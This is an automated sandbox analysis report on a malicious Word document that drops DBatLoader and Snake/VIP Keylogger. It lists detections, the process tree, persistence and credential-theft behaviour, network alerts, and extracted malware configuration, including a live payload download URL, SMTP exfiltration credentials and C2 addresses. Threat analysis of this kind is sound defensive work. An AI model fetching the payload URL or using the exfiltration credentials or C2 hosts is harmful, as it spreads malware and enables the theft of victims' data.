Windows Analysis Report
ITT # KRPBV2663 .doc

Overview

General Information

Sample name: ITT # KRPBV2663 .doc
Analysis ID: 1584675
MD5: 754c08a32cbfe16e0982b5b56835e247
SHA1: 7338cada263faae3d79631efa1c895bf690a4eb3
SHA256: d9980559077d0cf6e251608efa44277ac5cd2b64236ecc31b352a93992e2f2b7
Tags: doc, user-abuse_ch

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for sample
Office process drops PE file
Office process queries suspicious COM object (likely to drop second stage)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 3732 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • brightness.exe (PID: 5560 cmdline: C:\Windows\SysWOW64\brightness.exe MD5: 6047499517804F1EA76B508CA469DE99)
      • cmd.exe (PID: 4676 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • jphwmyiA.pif (PID: 7208 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Aiymwhpj.PIF (PID: 7708 cmdline: "C:\Users\Public\Libraries\Aiymwhpj.PIF" MD5: 6047499517804F1EA76B508CA469DE99)
    • cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jphwmyiA.pif (PID: 7820 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Aiymwhpj.PIF (PID: 7920 cmdline: "C:\Users\Public\Libraries\Aiymwhpj.PIF" MD5: 6047499517804F1EA76B508CA469DE99)
    • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jphwmyiA.pif (PID: 8016 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}
{"Exfil Mode": "SMTP", "Email ID": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000007.00000002.2166181878.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author | Strings
10.2.jphwmyiA.pif.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
19.1.jphwmyiA.pif.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
19.2.jphwmyiA.pif.22770ee8.5.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
19.2.jphwmyiA.pif.22770ee8.5.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
19.2.jphwmyiA.pif.22770ee8.5.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

System Summary

Source: File created, Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 5560, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\jphwmyiA.pif, NewProcessName: C:\Users\Public\Libraries\jphwmyiA.pif, OriginalFileName: C:\Users\Public\Libraries\jphwmyiA.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 5560, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, ProcessId: 7208, ProcessName: jphwmyiA.pif
Source: File created, Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 3732, TargetFilename: C:\Windows\SysWOW64\brightness.exe
Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 5560, TargetFilename: C:\Windows \SysWOW64\svchost.exe
Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Aiymwhpj.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 5560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aiymwhpj
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Aiymwhpj.PIF" , ParentImage: C:\Users\Public\Libraries\Aiymwhpj.PIF, ParentProcessId: 7708, ParentProcessName: Aiymwhpj.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 7760, ProcessName: cmd.exe
Source: Network Connection, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\jphwmyiA.pif, Initiated: true, ProcessId: 7208, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49723
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Aiymwhpj.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 5560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aiymwhpj
Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\jphwmyiA.pif, NewProcessName: C:\Users\Public\Libraries\jphwmyiA.pif, OriginalFileName: C:\Users\Public\Libraries\jphwmyiA.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 5560, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, ProcessId: 7208, ProcessName: jphwmyiA.pif
Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49710, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 3732, Protocol: tcp, SourceIp: 147.124.216.113, SourceIsIpv6: false, SourcePort: 80
Source: Network Connection, Author: frack113: Data: DestinationIp: 208.91.198.176, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\jphwmyiA.pif, Initiated: true, ProcessId: 7208, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 53704

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T07:54:14.591406+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49730 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:15.975264+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49733 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:22.115322+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 53612 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:23.507981+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 53624 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:25.736960+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 53644 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:33.415581+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 53705 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:34.638891+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 53716 | 188.114.97.3 | 443 | TCP
2025-01-06T07:54:36.240323+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 53731 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T07:54:12.243144+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49723 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:14.133786+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49723 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:15.515041+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49731 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:16.930648+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49736 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:18.508728+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53584 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:23.990983+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53623 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:25.170046+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53623 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:26.967936+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53650 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:28.402962+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53662 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:29.896406+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53671 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:31.399524+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53681 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:31.412893+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53683 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:32.647270+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53694 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:32.866022+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53681 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:33.990289+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53709 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:34.256624+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53711 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:35.694139+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53724 | 132.226.8.169 | 80 | TCP
2025-01-06T07:54:37.084764+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53738 | 132.226.8.169 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T07:54:25.816325+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.5 | 53643 | 149.154.167.220 | 443 | TCP
2025-01-06T07:54:36.927393+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.5 | 53734 | 149.154.167.220 | 443 | TCP
2025-01-06T07:54:44.379776+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.5 | 53795 | 149.154.167.220 | 443 | TCP

AV Detection

Source: ITT # KRPBV2663 .doc, Avira: detected
Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}
Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}
Source: 7.0.brightness.exe.400000.0.unpack, Malware Configuration Extractor: DBatLoader {"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF, ReversingLabs: Detection: 26%
Source: C:\Windows\SysWOW64\brightness.exe, ReversingLabs: Detection: 26%
Source: ITT # KRPBV2663 .doc, ReversingLabs: Detection: 47%
Source: ITT # KRPBV2663 .doc, Virustotal: Detection: 56%
Source: ITT # KRPBV2663 .doc, Joe Sandbox ML: detected

Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org

Compliance

Source: C:\Users\Public\Libraries\jphwmyiA.pif, Unpacked PE file: 10.2.jphwmyiA.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\jphwmyiA.pif, Unpacked PE file: 15.2.jphwmyiA.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\jphwmyiA.pif, Unpacked PE file: 19.2.jphwmyiA.pif.400000.1.unpack
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53636 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53696 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53643 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53734 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53795 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, Aiymwhpj.PIF
Source: Binary string: easinvoker.pdb source: brightness.exe, Aiymwhpj.PIF
Source: Binary string: _.pdb source: jphwmyiA.pif
Source: Binary string: easinvoker.pdbGCTL source: brightness.exe, Aiymwhpj.PIF
Source: C:\Windows\SysWOW64\brightness.exe, Code function: 7_2_027B58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File created: C:\Windows\SysWOW64\brightness.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File created: brightness.exe.0.dr
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Process created: C:\Windows\SysWOW64\brightness.exe
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504DCCEh10_2_2504DA00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504BCDEh10_2_2504BA10
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250448C9h10_2_25044620
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504EF0Eh10_2_2504EC40
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250402E9h10_2_25040040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25041CF9h10_2_25041A50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504CF1Eh10_2_2504CC50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504AF2Eh10_2_2504AC60
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25045709h10_2_25045460
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25043311h10_2_25043068
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25044D21h10_2_25044A78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504E15Eh10_2_2504DE90
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25040741h10_2_25040498
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504C16Eh10_2_2504BEA0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504A17Eh10_2_25049EB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25045B61h10_2_250458B8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25043769h10_2_250434C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504517Bh10_2_25044ED0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504F39Eh10_2_2504F0D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504D3AEh10_2_2504D0E0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 2504B3BEh10_2_2504B0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 25040B99h10_2_250408F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B4C77h10_2_250B4908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B52A0h10_2_250B4FA8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B8C00h10_2_250B8908
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B60F8h10_2_250B5E00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BF9F8h10_2_250BF700
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B2BE6h10_2_250B2918
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BE210h10_2_250BDF18
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BB708h10_2_250BB410
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B0BF6h10_2_250B0928
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B9F20h10_2_250B9C28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B7418h10_2_250B7120
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B3507h10_2_250B3238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B5C30h10_2_250B5938
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BF530h10_2_250BF238
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BCA28h10_2_250BC730
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B1516h10_2_250B1248
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BB240h10_2_250BAF48
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B030Eh10_2_250B0040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B8738h10_2_250B8440
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B3E26h10_2_250B3B58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B6F50h10_2_250B6C58
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BDD48h10_2_250BDA50
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B1E36h10_2_250B1B68
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BC560h10_2_250BC268
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B9A58h10_2_250B9760
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B4746h10_2_250B4478
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B8270h10_2_250B7F78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B5768h10_2_250B5470
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BF069h10_2_250BED70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B2756h10_2_250B2488
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BD880h10_2_250BD588
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250BAD78h10_2_250BAA80
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 250B9590h10_2_250B9298
